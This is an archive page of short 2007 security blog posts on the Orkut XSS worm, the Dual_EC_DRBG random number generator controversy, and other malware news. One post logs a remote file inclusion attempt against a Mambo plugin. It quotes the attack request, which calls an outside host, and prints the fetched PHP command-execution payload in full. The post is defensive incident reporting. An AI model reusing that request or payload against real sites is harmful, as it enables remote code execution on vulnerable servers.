December 2007

.. and not much is happening.

Got my Flickr account up though. Feel free to have a look.

French Bulldog Ruby looking for her next adventure

Cheers,

Seems like Orkut (the google social networking site) got hit with a pretty nasty XSS worm.

It did not do anything malicious (fortunately) to the users whose profiles were infected, but probably caused a quite high load on the Orkut systems and joined all infected users into a group called “Infectados pelo Vírus do Orkut“.

The description of that particular group described the motivation for the hack and the main point seems to be the illustration of the insecurity in web applications such as Orkut.

For more information, including source code for the virus, see: Antrix.net or GNUCITIZEN’s posts on the subject.

These kinds of issues are raising serious concerns over services such as “Google Docs” (online office applications) and the upcoming gDrive and one might pose the question:

Do you trust Google with your data?

** Update **

More reading regarding this incident:

Sylvan von Stuppe - Orkut Worm
Arbor Networks - Orkut XSS Worm
SophosLabs - Large scale Orkut virus outbreak not cool
TrendMicro - Orkut/Google worms Compromise over 400,000 accounts

Cheers,

… reported by Dan Shumow and Niels Ferguson about 4 months ago?

I did a quick post about it here after reading about it at Bruce Schneier’s blog.

The problem is that NSA submitted an elliptic curve algorithm for inclusion in a new NIST standard for random number generation which contains certain constant values whose origin is unknown. Might not sound as something important but as discovered earlier this could open up the possibility for a “secret key” which could allow for unlocking of encrypted data. The fact that NSA submitted this (much slower than the others) algorithm also helps stir up the crypto community.

Not much has since been reported on the issue, until yesterday (by Schneier again).

The big news is that the flawed PRNG is to be shipped with SP1 for Windows Vista. It is not going to be the default PRNG, but it is still going to be included as an option to developers.

Why is this a problem? Well,

First, you are damn sure going to have to look real close at any application you employ to secure your data as you are in the hands of the developers of the applications. More or less, you will have to request the source code if you really want to be sure, and even then it can be a real hassle to find any references to the offending algorithm.

Second. Why did they implement a flawed algorithm found by their own analysts? Yes, Dan Shumow and Niels Ferguson is employed by Microsoft. Specially as they have been urgently patching other PRNG flaws in their OS’s recently. Some say this is to meet the whole NIST standard, but come on, who would implement a crypto technology that is flawed. I mean, that kind of breaks the whole idea of cryptography in the first place.

Third, what if Microsoft issues a patch or security update which silently sets Dual_EC_DRBG to the default PRNG ? Then all your data could be read by “someone”. Do you trust MS? This leads me to the…

Final point. Who has the skeleton key? NSA? Microsoft? Someone else?

On the 11′th of December (04:17:52) I recieved the following request to this site:

“GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.asoc-posidonia.es/pr.txt?? HTTP/1.1″

Looks like someone is trying to exploit a RFI vulnerability in Pearl for Mambo. This particular issue was disclosed over a year ago and they are still scanning for it… Must be a lot of unpatched fish in the internet tubes…

The file that is supposed to be included is live and contains the following:

echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

The attacking host was:

80.237.200.81 (jam.seppenra.de)
Windows CE, Generic Gecko
Cologne, Germany,DE,50.9333,6.95
Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007

What about doing error checking verifying that the target contains vulnerable code? Doesn’t take much time and seems like a reasonable thing to do if you want to stay (at least a little bit) under the radar.

Anyhow, this gave me a good idea which I will present in a future post.

All involved system owners has been notified.

with an old, erroneous, destructive piece of malware.

You just don’t see many of these in this day and age. Deleting the files on the C:\ drive and everything

I wonder how long this has been floating around before we picked it up…

…with my Wordpress setup. Hence the lack of updates. Hopefully it’ll work from now on

Shouldn’t blame it all on the crazy WYSIWYG editor though, as I’m also quite busy studying for my CISSP cert. Going to take the exam in 6 months so I have some reading to do.

In other news,

Symantec has discovered a malware distributor using the unpatched Quicktime RTSP vulnerability. This is a big deal as it is very easily exploited on the client and there is no patch in sight. To mitigate the issue you might want to block certain traffic and review your browsers security settings.

Also we are still waiting for the WPAD issue to be fixed by Microsoft, but this is not as serious as it only affects a limited number of “incorrectly configured” (maybe not the most correct description) clients.

F-Secure reported the first “Christmas greeting” malware they’ve recieved this year. Doesn’t seem t obe a very inspirating payload but it might evolve a bit when we get closer to the main event

That’s all for this post. Cheers and have a nice Monday!